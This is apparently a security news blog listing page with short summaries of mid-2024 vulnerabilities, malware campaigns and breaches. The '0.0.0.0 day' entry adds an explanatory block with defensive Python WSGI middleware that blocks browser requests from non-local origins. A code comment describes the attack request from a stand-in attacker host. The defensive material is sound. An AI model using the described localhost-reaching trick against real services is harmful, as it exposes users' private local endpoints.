New Exploit BYOVDLL Bypasses LSASS Protection

In July 2022, Microsoft patched a PPL bypass flaw, but a new exploit called "BYOVDLL" has been discovered, allowing attackers to bypass LSASS protection. All about BYOVDLL: In October 2022, [...]

Malspam Targets AnyDesk and Microsoft Teams

Cybersecurity researchers have uncovered a sophisticated malspam campaign targeting users via email and phone. Attackers are exploiting AnyDesk and Microsoft Teams to gain unauthorized access to victims' computers, highlighting evolving [...]

By | August 16th, 2024|malicious cyber actors, Malware, Security Advisory, Security Update, Spam|0 Comments

Ransomware Group Introduces New EDR Killer Tool

A ransomware group, RansomHub, has introduced EDRKillShifter, a tool designed to disable EDR systems. This advancement highlights the group's evolving tactics to bypass security measures and execute attacks. Although a [...]

By | August 16th, 2024|BOTNET, Compromised, Exploitation, malicious cyber actors, Malware, Ransomware|0 Comments

Critical IBM QRadar Flaws Enable Remote Arbitrary Code Execution

IBM recently revealed critical vulnerabilities in QRadar Suite Software and IBM Cloud Pak for Security. Exploitation of these flaws could let attackers execute arbitrary code remotely, posing serious security risks. [...]

0.0.0.0 Day – 18-Year-Old Flaw Bypasses Browser Security

Threat actors frequently exploit browser flaws to gain unauthorized access and conduct various illicit activities. Recently, Oligo Security discovered a critical 18-year-old vulnerability, dubbed "0.0.0.0 day," which bypasses all browser [...]
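The practical consequence of 0.0.0.0 day is that a page on a public website can make the browser send requests to `http://0.0.0.0:<port>/`, which reaches any local service bound to all interfaces, sidestepping the loopback checks of Private Network Access. A developer-side mitigation, independent of the browser fix, is to refuse requests whose Host and Origin headers do not name the loopback host and to bind to 127.0.0.1 rather than 0.0.0.0. The WSGI middleware below is an added example, not code from Oligo Security or the article; the demo application, the allowlists and the port are assumptions.

```python
"""WSGI guard for a local dev service: reject requests that did not come from a local
Host and Origin, the server-side mitigation for "0.0.0.0 day" (added example)."""
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"localhost", "127.0.0.1", "[::1]"}   # what the Host header may name
LOCAL_ORIGIN_HOSTS = {"localhost", "127.0.0.1", "::1"} # what a browser Origin may name


def host_without_port(host_header):
    """'127.0.0.1:8000' -> '127.0.0.1'; '[::1]:8000' -> '[::1]'."""
    h = host_header.strip().lower()
    if h.startswith("["):
        return h.split("]", 1)[0] + "]"
    return h.split(":", 1)[0]


def origin_is_local(origin):
    """No Origin header means same-origin navigation or a non-browser client."""
    if origin is None:
        return True
    try:
        return urlsplit(origin).hostname in LOCAL_ORIGIN_HOSTS
    except ValueError:
        return False


class LocalOnly:
    """WSGI middleware: 403 unless Host and Origin both point at the loopback host."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        host = host_without_port(environ.get("HTTP_HOST", ""))
        origin = environ.get("HTTP_ORIGIN")
        if host not in ALLOWED_HOSTS or not origin_is_local(origin):
            # A page on attacker.invalid fetching http://0.0.0.0:8000/ arrives with
            # Host: 0.0.0.0:8000 and Origin: https://attacker.invalid; both checks fail,
            # and no CORS headers are emitted, so the response stays unreadable to the page.
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"forbidden: not a local request\n"]
        return self.app(environ, start_response)


def demo_app(environ, start_response):
    """Stand-in for the local service being protected (assumed, not a real product)."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"secret dev endpoint\n"]


app = LocalOnly(demo_app)


def simulate(environ):
    """Drive the WSGI app without a server; returns (status line, body)."""
    captured = {}

    def start_response(status, headers):
        captured["status"] = status

    body = b"".join(app(environ, start_response))
    return captured["status"], body


if __name__ == "__main__":
    from wsgiref.simple_server import make_server
    # Bind to loopback only: listening on 0.0.0.0 is what let the trick reach the service.
    make_server("127.0.0.1", 8000, app).serve_forever()
```

The Host check alone defeats the 0.0.0.0 trick and also DNS-rebinding variants that arrive with an attacker's hostname; the Origin check covers the case where a public page targets `http://localhost:8000/` directly on a browser that does not enforce Private Network Access. Authentication on the local endpoint is still the durable fix; this middleware is the cheap layer in front of it.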

Update Now: Critical SAP Auth Bypass and SSRF Vulnerabilities Fixed

SAP has issued a major security update addressing critical authentication bypass and server-side request forgery vulnerabilities, with CVSS scores of 9.8 and 9.1. The company advises all users to install [...]

1Password macOS Vulnerability Leads to Credentials Leak

A critical vulnerability in 1Password for macOS allows attackers to bypass security measures and access vault items. This issue affects every version of the macOS app. A patch is now [...]

Apache OFBiz RCE Vulnerability Found, Patch Immediately

A vulnerability, CVE-2024-38856, has been found in Apache OFBiz, allowing unauthenticated remote code execution. A patch is available, and developers strongly recommend installing it immediately due to the high risk [...]

By | August 6th, 2024|Security Advisory, Security Update, Tips, vulnerability|0 Comments

New Spyware Targeting Android Users

Cybersecurity experts have uncovered sophisticated Android spyware, LianSpy, targeting users to steal sensitive data. It uses advanced evasion techniques, posing a significant threat to Android users globally. All about LianSpy [...]

Russia-linked APT used a car ad to phish diplomats with Headlace malware.

A Russia-linked threat actor used a car ad to phish diplomats and deliver the HeadLace backdoor, likely starting in March 2024, according to Palo Alto Networks Unit 42. They attribute [...]

Critical Flaw in Voice Over Wi-Fi Allows Eavesdropping

Voice Over Wi-Fi (VoWiFi) is commonly used for making voice calls over Wi-Fi, improving call quality and reliability. Recently, cybersecurity researchers discovered a vulnerability in VoWiFi that allows attackers to [...]

Ubiquiti G4 Vulnerability Discovered, Enabling DDoS Attacks

Researchers found a flaw in Ubiquiti G4 Wi-Fi cameras that exposes critical data. They believe a similar vulnerability was used in 2019 for DoS attacks on many cameras. Despite Ubiquiti's [...]

Hackers Exploit WordPress Plugin File Upload Flaw

Hackers are exploiting a critical vulnerability (CVE-2024-6220) in the WordPress plugin 简数采集器 (Keydatas) that allows unauthenticated users to upload arbitrary files, risking remote code execution and full site takeover. On [...]

Microsoft Patches Critical Edge Flaw Enabling Code Execution

Microsoft has patched critical vulnerabilities in Edge. Users should update to the latest version to ensure security. AhnLab ASEC identified these flaws in Edge versions 127.0.6533.88 and 127.0.6533.89. All about [...]

Hackers Exploiting GeoServer RCE Flaw, 6,635 Servers at Risk

A critical flaw in GeoServer, an open-source Java server for geospatial data, exposes thousands of servers to risk. The vulnerability, CVE-2024-36401, allows unauthenticated remote code execution, threatening global geospatial data infrastructures. A recent [...]

Phishing Campaign Exploited Proofpoint for Email Spoofing

Guardio Labs recently identified "EchoSpoofing," a critical vulnerability in Proofpoint's email protection service used by 87% of Fortune 100 companies. This flaw allows hackers to send spoofed phishing emails through the service, tricking recipients [...]

New Specula Tool Turns Outlook into a C2 Server via Registry Exploit

Cybersecurity firm TrustedSec has introduced a new tool named Specula, which leverages a longstanding vulnerability in Microsoft Outlook to turn it into a Command and Control (C2) server. This discovery [...]

Microsoft 365 and Azure Outage Disrupts Multiple Services

Microsoft is investigating a global outage affecting access to some Microsoft 365 and Azure services. Microsoft 365 and Azure Outage: Currently, the incident affects users worldwide and only a subset [...]

By | July 31st, 2024|Internet Security, Security Advisory, Security Update, Tips|0 Comments

Chinese Users Targeted by Gh0st RAT Malware Through Fake Chrome Page

Attackers are using Gh0stGambit to spread Gh0st RAT malware to Chinese users via a fake Google Chrome download page, mimicking the legitimate site. GH0ST RAT Trojan Targets Chinese Windows Users [...]

Progress Patches New Privilege Escalation Flaw in MOVEit File Transfer

Progress, the company behind MOVEit Transfer, has issued a critical security alert for a newly discovered vulnerability in its product. The flaw, CVE-2024-6576, is classified as high-severity with a CVSS [...]

Malicious Python Package Targets macOS Developers for Google Cloud Login Theft

Hackers exploit malicious Python packages to attack developer environments, inject harmful code, and steal sensitive information or install malware. This method leverages popular repositories for broad impact with minimal effort. [...]

RaspAP Vulnerability Allows Hackers to Gain Privileges on Raspberry Pi Devices

A critical local privilege escalation vulnerability (CVE-2024-41637) was found in RaspAP, an open-source project for turning Raspberry Pi devices into wireless access points or routers. Rated 9.9 (Critical) on the [...]

Phishing Attack Hits Indian Mobile Users via India Post Scams

Indian iPhone users are inundated with SMS phishing scams posing as India Post delivery notifications, aimed at stealing credentials for future scams. Fraudsters Pose as India Post in SMS Phishing [...]

Threat Actors Claim Leak of 250M IOC Data; CrowdStrike Responds

The hacktivist group USDoD claims to have leaked CrowdStrike's "entire threat actor list" and an "entire IOC list" with over 250 million data points. Details of the Alleged Leak: On [...]

By | July 26th, 2024|BOTNET, Compromised, Exploitation, Security Advisory, Security Update|0 Comments

Google Chrome Issues Warnings for Malicious Downloads

Google Chrome now has a new download system with alerts for potentially harmful files, enhancing user security. Last year, Google Chrome introduced a revamped downloads interface on desktops, making it [...]

Jellyfish Loader Malware Discovered, Poses Threat to 2024 Olympics

A new threat, Jellyfish Loader, has been identified as a .NET-based shellcode downloader disguised as a Windows shortcut. Despite its unusual features suggesting it may still be in development, it [...]

Alert: Krampus Loader Gaining Popularity on the Dark Web

"Krampus," a new malware loader, is gaining popularity on the dark web, according to MonThreat on X (formerly Twitter). What is Krampus Loader Krampus Loader is a type of malware [...]

Watch Out for Malicious Python Packages That Steal Sensitive Data

Malicious Python packages uploaded by "dsfsdfds" to PyPI stole sensitive data from user systems and sent it to a Telegram bot likely associated with Iraqi cybercriminals. Active since 2022, the [...]

By | July 24th, 2024|BOTNET, Compromised, Exploitation, Security Advisory, Security Update|0 Comments

Attackers Exploit Swap File to Steal Credit Card Information

Researchers at Sucuri recently discovered that website swap files can be exploited to install a persistent credit card skimmer on Magento e-commerce platforms. Swap files, which store overflow data from [...]

Flaw in Cisco VPN routers enables remote code execution by attackers

Cisco disclosed a significant flaw in the upload module of RV340 and RV345 VPN routers, allowing remote, authenticated attackers to run arbitrary code. Tracked as CVE-2024-20416 with a CVSS score [...]

Watch Out for Fake Browser Updates Installing Malicious BOINC Software

Since July 4, 2024, SocGholish (FakeUpdates) has shown new behavior. The infection chain starts with a compromised website prompting a fake browser update. Downloading the update triggers malicious code that [...]

SonicOS IPSec VPN Vulnerability Allows Attackers to Cause DoS Condition

SonicWall has disclosed a critical heap-based buffer overflow vulnerability in SonicOS IPSec VPN, identified as CVE-2024-40764, which can allow remote attackers to cause a DoS condition. The vulnerability has a [...]

BadPack Malware for Android Infects APK Installers

New research reveals a novel approach to hiding malware in APK installers. Adversaries manipulate the file header to circumvent protection and make analysis much more difficult. The peak usage of [...]

By | July 21st, 2024|Android malware, BOTNET, Compromised, Malware, Tips|0 Comments

Hackers Claim Dettol Data Breach Affects 453,646 Users

Threat actor ‘Hana’ claims to have breached Dettol India, affecting 453,646 users, according to a FalconFeedsio post on X. Dettol Data Breach The post reveals that the breach exposed user [...]

CrowdStrike Update Leads to Widespread Windows BSOD Crashes

A recent CrowdStrike update has caused widespread Blue Screen of Death (BSOD) errors on Windows machines. The issue affects multiple versions of the company’s sensor software, prompting an urgent investigation [...]

By | July 19th, 2024|Internet Security, Security Advisory, Security Update, windows|0 Comments